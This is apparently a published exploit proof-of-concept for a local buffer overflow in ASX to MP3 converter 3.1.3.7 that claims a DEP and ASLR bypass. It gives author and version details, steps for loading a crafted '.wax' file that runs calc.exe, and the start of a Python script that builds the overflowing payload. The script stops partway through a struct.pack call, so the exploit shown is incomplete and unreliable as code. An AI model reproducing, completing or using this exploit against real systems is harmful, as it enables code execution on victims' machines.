# Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC)
# Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-08-25
# Vulnerable Software: ASX to MP3 converter
# Version: 3.1.3.7.2010.11.05
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

# Proof of Concept :
# 1.- Run python code: asx_to_mp3_rop_exploit.py
# 2.- Works on DEP enabled for ASX2MP3Converter.exe
# 3.- Open "ASX2MP3Converter.exe"
# 4.- Click on "Load" Button
# 5.- Select generated file "asx_to_mp3_rop_exploit.wax".
# 6.- Click on "Open".
# 7.- Calc.exe runs.

#################################################################################################################################################
# Python "asx_to_mp3_rop_exploit.py" Code:

import struct

file = 'asx_to_mp3_rop_exploit.wax'

payload = "http://"
payload += "A" * 17417 + struct.pack('